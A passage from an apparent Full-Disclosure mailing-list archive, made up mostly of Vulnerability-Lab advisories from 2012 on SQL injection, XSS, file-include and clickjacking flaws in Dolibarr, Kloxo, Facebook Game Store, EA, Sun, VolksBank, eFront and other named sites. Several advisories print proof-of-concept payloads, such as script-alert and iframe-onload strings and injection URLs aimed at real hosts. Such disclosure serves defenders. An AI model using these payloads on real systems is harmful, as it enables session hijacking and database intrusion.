d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note, d.email, d.phone, d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as datec, d.tms as datem, d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as country_id, p.code as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code, t.libelle as type, t.cotisation as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d LEFT JOIN llx_c_pays as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN llx_user as u ON d.rowid = u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\\\' Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... 1.1 1. Login to the Panel 2. Open the list.php 3. Include the following example string - on the memberslist -%20` 1.2 http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!] Risk: = The security risk of the sql injection vulnerabilities are stimated as high(+). Credits: Vulnerability Research Laboratory -Benjamin Kunz MejriUcha Gobejishvili Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form
[Full-disclosure] Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities
Title: == Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities Date: = 2012-02-06 VL-ID: = 418 Abstract: = Alexander Fuchs discovered 2 remote SQL Injection Vulnerabilities on the official website of Indianapolis Superbowl 2012 (US). Status: Verified by Laboratory Severity: = High Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Linux Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities
Title: == Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities Date: = 2012-02-10 References: === http://www.vulnerability-lab.com/get_content.php?id=429 VL-ID: = 429 Introduction: = Scriptable, distributed and object oriented Hosting Platform. Manage Clients, Resellers, Domains, Backups, Stats, Mails and Databases. Manage everything! (Copy of the Vendor Homepage: http://www.lxcenter.org/) Abstract: = Vulnerability-Lab Team discovered multiple web vulnerabilities on Kloxos LxCenter Server CP v6.1.10. Report-Timeline: 2012-02-10:Public or Non-Public Disclosure Status: Unpublished Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistant input validation vulnerabilities are detected on Kloxos LxCenter Server CP v6.1.10. The bug allows remote attacker to implement malicious script code on the application side (persistent). Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) can lead to session hijacking (user/mod/admin). Vulnerable Module(s): [+] LocalHost {Command Center} [+] Server Information Verbose Settings Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers with medium required user inter action. For demonstration or reproduce ... 1.1 Localhost {Command Center} script global_need_list = new Array(); /scriptscript global_match_list = new Array(); /scriptscript global_desc_list = new Array(); /scriptform onsubmit=``return check_for_needed_variables(`command_centerlocalhost`);`` method=``post`` enctype=``multipart/form-data`` action=``/display.php`` id=``command_centerlocalhost`` name=``command_centerlocalhost`` fieldset style=``background-color: rgb(255, 255, 255); border: 0px none; padding: 10px;`` width=``90%``legend style=`` font-weight: normal; border: 0px none;``font color=``#303030`` style=``font-weight: bold;``Command Center for localhost /font /legend/fieldset div align=``left`` style=``background-color: rgb(255, 255, 255); width: 90%;``div align=`` left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/ input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/ div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;`` Command br/ ... or input width=``60%`` type=``text`` value=`` name=``frm_pserver_c_ccenter_command`` class=``frm_pserver_c_ccenter_command textbox``/ iframe size=``30`` ``=`` [PERSISTENT SCRIPT CODE INJECT!]` src=``a`` /div div align=left style=`padding:10 10 10 10 ;border-top :1px solid #aa; background-color:#ff;display:block` Output br textarea nowrap id=textarea_ class= frmtextarea rows=10 style=`margin:0 0 0 50;width:85%;height:200px;` name=`` size=30 /textarea script type=``text/javascript``createTextAreaWithLines(`textarea_`);/script style 1.2 Server = Information = 2 x Verbose Input font color=``#303030`` style=``font-weight: bold;``Information for localhost /font /legend/fieldset div align=``left`` style=``background-color: rgb(255, 255, 255); width: 90%;``div align=``left`` style=``width: 500px; border: 1px solid rgb(177, 192, 240);``input type=``hidden`` value=``pserver`` name=``frm_o_o[0][class]``/ input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/ script global_need_list[`frm_pserver_c_description`] = `Verbose Description (to Identify)`; /script div align=``left`` style=``padding: 10px; background-color: rgb(250, 248, 248); display: block;`` Verbose Description (to Identify) font color=``red``sup*/sup/font br/ input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` iframe=`` value=`` `` name=``frm_pserver_c_description`` class=``frm_pserver_c_description textbox``/`` size=``30`` /div div align=``left`` style=`` padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(255, 255, 255); display: block;`` FQDN Hostname br/ input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]`` iframe=`` value= name=``frm_pserver_c_realhostname`` class=`` frm_pserver_c_realhostname textbox``/`` size=``30`` /div div align=``left`` style=``padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(250, 248, 248); display: block;`` Load Threshold At Which Warning Is Sent br/ input width=``60%`` type=``text`` size=``30`` value=``20`` name=``frm_pserver_c_load_threshold`` class=``frm_pserver_c_load_threshold textbox``/ /div input type= ``hidden`` value=``update`` name=``frm_action``/ input type=``hidden`` value=``information`` name=``frm_subaction``/ Reference(s): ../command-center.txt
[Full-disclosure] Sun Microsystems (Print) - Cross Site Scripting Vulnerability
Title: == Sun Microsystems (Print) - Cross Site Scripting Vulnerability Date: = 2012-02-01 References: === http://www.vulnerability-lab.com/get_content.php?id=404 VL-ID: = 404 Introduction: = Sun Microsystems, Inc. was a company that sold computers, computer components, computer software, and information technology services. Sun was founded on February 24, 1982. At its height, Sun headquarters were in Santa Clara, California (part of Silicon Valley), on the former west campus of the Agnews Developmental Center. On January 27, 2010, Sun was acquired by Oracle Corporation for US$7.4 billion, based on an agreement signed on April 20, 2009. The following month, Sun Microsystems, Inc. was merged with Oracle USA, Inc. to become Oracle America, Inc.Sun products included computer servers and workstations based on its own SPARC processors as well as AMD s Opteron and Intel s Xeon processors; storage systems; and, a suite of software products including the Solaris operating system, developer tools, Web infrastructure software, and identity management applications. Other technologies included the Java platform, MySQL, and NFS. Sun was a proponent of open systems in general and Unix in particular, and a major contributor to open source software. Sun s main manufacturing facilities were located in Hillsboro, Oregon and Linlithgow, Scotland. (Copy of the Homepage: http://en.wikipedia.org/wiki/Sun_Microsystems) Die Java-Technik (englisch Java Technology) ist eine ursprünglich von Sun entwickelte Sammlung von Spezifikationen, die einerseits die Programmiersprache Java und andererseits verschiedene Laufzeitumgebungen für Computerprogramme definieren. Diese Computerprogramme werden meistens in Java geschrieben. Die Java-Technik besteht aus den folgenden Bestandteilen: die Programmiersprache Java, um Programme zu formulieren das „Open Java Development Kit“ – ein Entwicklungswerkzeug das grundlegende Teile, wie einen Übersetzer und Bibliotheken, enthält die Java-Laufzeitumgebung – eine standardisierte Software-Plattform um die entwickelten Programme ausführen zu können. (Copy of the Homepage: http://de.wikipedia.org/wiki/Java_%28Technik%29) Abstract: = Vulnerability-Lab Team discovered a high priority Cross Site Scripting Vulnerability on different section of the java sun vendor service. Report-Timeline: 2012-01-31: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple client side cross site scripting vulnerability are detected on the sun.com website of the java and developer portal. Successful exploitation of the vulnerability allows session hijacking, client side phishing client side context manipulation. Vulnerable Module(s): [+] PrintPage.jsp Proof of Concept: = The cross site scripting vulnerability can be exploited by remote attacker with medium required user inter action. For demonstration or reproduce ... Java.COM table border=0 cellpadding=0 cellspacing=0 width=100% tbodytr td width=100%div class=breadcrumb[Cross Site Scripting]/div/td/tr/tbody/table/body/html Sun.COM body leftmargin=0 topmargin=0 rightmargin=10 bgcolor=#ff marginheight=0 marginwidth=0 a name=top/a div class=vnv1sunlogoa href=http://www.sun.com/;img src=PrintPage.jsp_files/vnv1_sunlogo.htm alt=sun.com border=0 height=24 width=55/a/div table border=0 cellpadding=0 cellspacing=0 width=100% tbodytr td width=100%div class=breadcrumb[Cross Site Scripting]/div/td/tr/tbody/table/body/html Reference(s): http://developers.sun.com/jsp_utils/PrintPage.jsp?url=[Cross Site Scripting] http://java.sun.com/jsp_utils/PrintPage.jsp?url=[Cross Site Scripting] Download(s): ../sun.zip ../java.zip Risk: = The security risk of the cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from
[Full-disclosure] Electronic Arts - Cross Site Scripting Vulnerability
Title: == Electronic Arts - Cross Site Scripting Vulnerability Date: = 2012-02-06 References: === http://www.vulnerability-lab.com/get_content.php?id=367 VL-ID: = 367 Introduction: = Electronic Arts, Inc. (EA) (NASDAQ: EA) is a major American developer, marketer, publisher and distributor of video games. Founded and incorporated on May 28, 1982 by Trip Hawkins, the company was a pioneer of the early home computer games industry and was notable for promoting the designers and programmers responsible for its games. It is one of the largest video game publishers in the world. Originally, EA was a home computing game publisher. In the late 1980s, the company began developing games in-house and supported consoles by the early 1990s. EA later grew via acquisition of several successful developers. By the early 2000s, EA had become one of the world`s largest third-party publishers. On May 4, 2011, EA reported $3.8 billion in revenues for the fiscal year ending March 2011. EA began to move toward direct distribution of digital games and services with the acquisition of the popular online gaming site Pogo.com in 2001. In 2009, EA acquired the London-based social gaming startup Playfish, and in June 2011, EA launched Origin, an online service to sell downloadable games directly to consumers. In July 2011, EA announced that it had acquired PopCap Games, the company behind hits such as Plants vs. Zombies and Bejeweled. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Electronic_Arts) Abstract: = A Vulnerability-Lab researcher discovered a non persistent (client side) cross site scripting vulnerability on the Electronic Arts website. Report-Timeline: 2011-12-22: Vendor Notification 1 2012-01-06: Vendor Notification 2 2012-02-02: Vendor Notification 3 2011-**-**: Vendor Response/Feedback 2011-**-**: Vendor Fix/Patch 2011-02-06: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Low Details: A non persistent cross site scripting vulnerability is detected on the Electronic Arts Website. The vulnerability allows an remote attacker with required user inter action to hijack customer sessions via cross site scripting. Successful exploitation can result in account steal, client side phishing or session hijacking. Vulnerbale Module(s): [+] Search Picture(s): ../1.png Proof of Concept: = The vulnerability can be exploited by remote attacker with required user inter action. For demonstration or reproduce ... Note: To reproduce the issue include the script code on the search engine input field. PoC: scriptalert('Cross Site Scripting')/script Reference(s): https://help.ea.com/en/origin?q=scriptalert('Cross Site Scripting')/script Risk: = The security risk of the cross site scripting vulnerability is estimated as low(+). Credits: Vulnerability Research Laboratory - Sebastian Lüdtke (yak0n) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability-lab.com XSS
i recomment your desinformation with 2 short links ... article: http://www.vulnerability-lab.com/dev/?p=382 news: http://www.vulnerability-lab.com/news/get_news.php?id=74 ... we will not respond to this crap anymore ... false envy. by ;) -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VolksBank Online Banking - Multiple Web Vulnerabilities
Title: == VolksBank Online Banking - Multiple Web Vulnerabilities Date: = 2012-02-07 References: === http://www.vulnerability-lab.com/get_content.php?id=172 VL-ID: = 172 Introduction: = Die Volksbank AG trifft eine Reihe von Sicherheitsvorkehrungen, die einen wirksamen Schutz gegen Angriffe bei der Übertragung der Daten oder der Verarbeitung auf dem Bankenserver bieten. Treffen auch Sie Vorkehrungen zum Schutz vor unberechtigten Manipulationen oder Eingriffen von Dritten und melden Sie uns auffällige Mails. Geben Sie auf der folgenden Seite als Verfügernummer eine beliebige Zahl ein und klicken Sie anschließend auf LOGINum die Demo-Version zu starten. (Copy of the Vendor Homepage: https://www.banking.co.at/appl/ebp/login.html?resource=074demo=true) Abstract: = An anonymous Vulnerability Lab Researcher discovered multiple Web Vulnerabilities in the online-banking system of volksbank. Report-Timeline: 2011-07-03: Vendor Notification 1 2011-08-25: Vendor Notification 2 2011-11-17: Vendor Notification 3 2012-01-09: Vendor Notification 4 2011-**-**: Vendor Response/Feedback 2011-**-**: Vendor Fix/Patch 2011-02-07: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 Multiple Input Validation vulnerabilities are detected on hte volksbank portal banking website. Remote attackers can include malicious persistent script-codes on application side of the vulnerable affected modules. The vulnerability allows an attacker also to hijack not expired customers sessions. Vulnerable Module(s): [+] Vorlagen Name [+] Exception Handling [+] Vorlagen Gruppen Name [+] Default ASPX --- Exception Logs --- Error Page Exception SRVE0260E: The server cannot use the error page specified for your application to handle the Original Exception printed below. Original Exception: Error Message: SRVE0295E: Error reported: 400 Error Code: 400 Target Servlet: /zib/de/include/search_ergebnisn.jsp Error Stack: com.ibm.ws.webcontainer.webapp.WebAppErrorReport: SRVE0295E: Error reported: 400 at java.lang.Throwable.(Throwable.java:67) at javax.servlet.ServletException.(ServletException.java:72) at com.ibm.websphere.servlet.error.ServletErrorReport.(ServletErrorReport.java:67) at com.ibm.ws.webcontainer.webapp.WebAppDispatcherContext.sendError(WebAppDispatcherContext.java:600) at com.ibm.ws.webcontainer.srt.SRTServletResponse.sendError(SRTServletResponse.java:1180) at com.ibm.ws.webcontainer.srt.SRTServletResponse.sendError(SRTServletResponse.java:1162) at at.co.arz.cms.hk010.volksbank.filter.ParameterValidationFilter.doFilter(ParameterValidationFilter.java:67) at com.ibm.ws.webcontainer.filter.FilterInstanceWrapper.doFilter(FilterInstanceWrapper.java:188) at com.ibm.ws.webcontainer.filter.WebAppFilterChain.doFilter(WebAppFilterChain.java:116) at at.co.arz.cms.hk010.volksbank.filter.DomainBranchValidationFilter.doFilter(DomainBranchValidationFilter.java:124) at com.ibm.ws.webcontainer.filter.FilterInstanceWrapper.doFilter(FilterInstanceWrapper.java:188) at com.ibm.ws.webcontainer.filter.WebAppFilterChain.doFilter(WebAppFilterChain.java:116) at com.ibm.ws.webcontainer.filter.WebAppFilterChain._doFilter(WebAppFilterChain.java:77) at com.ibm.ws.webcontainer.filter.WebAppFilterManager.doFilter(WebAppFilterManager.java:908) at com.ibm.ws.webcontainer.servlet.ServletWrapper.handleRequest(ServletWrapper.java:934) at com.ibm.ws.webcontainer.servlet.ServletWrapper.handleRequest(ServletWrapper.java:502) at com.ibm.ws.webcontainer.servlet.ServletWrapperImpl.handleRequest(ServletWrapperImpl.java:179) at com.ibm.wsspi.webcontainer.servlet.GenericServletWrapper.handleRequest(GenericServletWrapper.java:121) at com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper.handleRequest(AbstractJSPExtensionServletWrapper.java:241) at com.ibm.ws.webcontainer.webapp.WebApp.handleRequest(WebApp.java:3826) at com.ibm.ws.webcontainer.webapp.WebGroup.handleRequest(WebGroup.java:276) at com.ibm.ws.webcontainer.WebContainer.handleRequest(WebContainer.java:931) at com.ibm.ws.webcontainer.WSWebContainer.handleRequest(WSWebContainer.java:1583) at com.ibm.ws.webcontainer.channel.WCChannelLink.ready(WCChannelLink.java:186) at com.ibm.ws.http.channel.inbound.impl.HttpInboundLink.handleDiscrimination(HttpInboundLink.java:445) at com.ibm.ws.http.channel.inbound.impl.HttpInboundLink.handleNewRequest(HttpInboundLink.java:504) at
[Full-disclosure] eFronts Community++ v3.6.10 - Cross Site Vulnerability
Title: == eFronts Community++ v3.6.10 - Cross Site Vulnerability Date: = 2012-02-07 References: === http://www.vulnerability-lab.com/get_content.php?id=423 VL-ID: = 423 Introduction: = Tailored with larger organizations in mind, eFront Community ++ offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Community ++ platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Community ++ builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-Community ++.html) Abstract: = A Vulnerability Lab Researcher discovered a cross site scripting vulnerability on eFronts Community ++ v3.6.10 Application. Report-Timeline: 2012-02-07: Public or Non-Public Disclosure Status: Published Affected Products: == eFront Product: Communiy ++ v3.6.10 Exploitation-Technique: === Remote Severity: = Low Details: A non persistent cross site scripting vulnerability is detected on eFronts Community++ application v3.6.10. The vulnerability allows an remote attacker to hijack customer/admin sessions with high required user inter action. Successful exploitation can result in account steal or client side context manipulation. Vulnerable Module(s): [+] filter= Picture(s): ../6.png Proof of Concept: = The vulnerability can be exploited by remote attackers with high required user inter action. For demonstration or reproduce ... http://server.com/communityplusplus/www/administrator.php?ctg=languagesajax=languagesTable; limit=200offset=0sort=activeorder=ascother=filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C Reference(s): ../xss.txt Risk: = The security risk of the non-persistent cross site scripting vulnerability is estimated as low(+). Credits: Vulnerability Research Laboratory - Chokri B.A. (Me!ster) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Facebook Game Store - SQL Injection Vulnerability
Title: == Facebook Game Store - SQL Injection Vulnerability Date: = 2012-02-04 References: === http://www.vulnerability-lab.com/get_content.php?id=408 VL-ID: = 408 Introduction: = The application is currently included and viewable by all facebook users. The service is an external 3rd party application sponsored by the Facebook Game Store Development Team. (Copy from the Vendors Homepage: http://apps.facebook.com/game_store/) Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics. (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook) Abstract: = Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the 3rd party web application - Facebook Game Store (apps.facebook.com). Report-Timeline: 2012-02-02: Vendor Notification 2012-02-02: Developer Notification 2012-02-04: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A remote SQL Injection vulnerability is detected on the Facebook Game Store application (apps.facebook). The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms. Vulnerable Module(s): [+] Game Store - Facebook 3rd Party Application Vulnerable Param(s)/File(s): [+] game_detail.php Affected Application: [+] apps.facebook.com/game_store/ --- SQL Error Logs --- Heading Tabs Facebook User 06 December 11 04:41:pm user: test -- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near / at line 1 Picture(s): ../1.png Proof of Concept: = The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... URL:http://apps.facebook.com/ Path: /game_store/ File: game_detail.php Example: http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection] PoC: http://apps.facebook.com/game_store/game_detail.php?gameid=13959[SQL-Injection]Act=en[SQL-Injection] Risk: = The security risk of the application sql injection vulnerabilities are estimated as high(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Dinama SMS Service - Persistent Web Vulnerability
Title: == Dinama SMS Service - Persistent Web Vulnerability Date: = 2012-02-05 References: === http://www.vulnerability-lab.com/get_content.php?id=417 VL-ID: = 417 Introduction: = Las soluciones de medios interactivos de DINAMA habilitan la comunicación bidireccional entre los medios y su público o audiencia. (Copy of the Vendor Homepage:http://www.dinama.com/) Abstract: = A Vulnerability Lab Researcher discovered a persistent remote web vulnerability on the DINAMA administration website(SMS|TV Service). Report-Timeline: 2012-02-05: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persisten input validation vulnerabilities are detected on the DINAMA SMS Service. The vulnerability allows an remote attacker to hijack other accounts by sending a malicous sms. Successful exploitation can result in account steal or execution of malicious persistent context. Vulnerable Module(s): [+] SMS - Topic Picture(s): ../dinama1.png ../dinama2.png Proof of Concept: = The vulnerability can be exploited by remote attacker with low required user inter action. For demonstration or reproduce ... Include the following strings as sms topic ... scriptalert('vulnerabilitylab')/scriptdiv style=1 iframe src=http://www.vulnerability-lab.com Risk: = The security risk of the persistent web vulnerability is estimated as medium(+). Credits: Vulnerability Research Laboratory - Ivan Montilla Miralles (eParanoidE) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Video = Cyberoam Central Console v2.x - File Include Vulnerability
Title: == Cyberoam Central Console v2.x - File Include Vulnerability Date: = 2012-02-05 References: === Download: http://www.vulnerability-lab.com/resources/videos/411.wmv View: http://www.youtube.com/watch?v=pGJy2XNugy8 VL-ID: = 411 Status: Published Exploitation-Technique: === Offensiv Severity: = High Details: The video shows a live exploitation session by Benjamin Kunz Mejri. The video explain how to get access to a web telnet console via file include vulnerability. Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Video = Google Service Reward #1 - ClickJacking Vulnerability
Title: == Google Service Reward #1 - ClickJacking Vulnerability Date: = 2012-02-07 References: === Download: http://www.vulnerability-lab.com/resources/videos/416.wmv View: http://www.youtube.com/watch?v=6N0YS9cTRHw VL-ID: = 416 Status: Published Exploitation-Technique: === Offensiv Severity: = High Details: The video shows the live exploitation session of aditya gupta a vulnerability lab researcher from india on a famous google service. In January 2012 he got a reward + credits by google security team for the remote exploitable security issue. Credits: Vulnerability Research Laboratory - Aditya Gupta Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HITB2011KUL - Post Memory Corruption Analysis
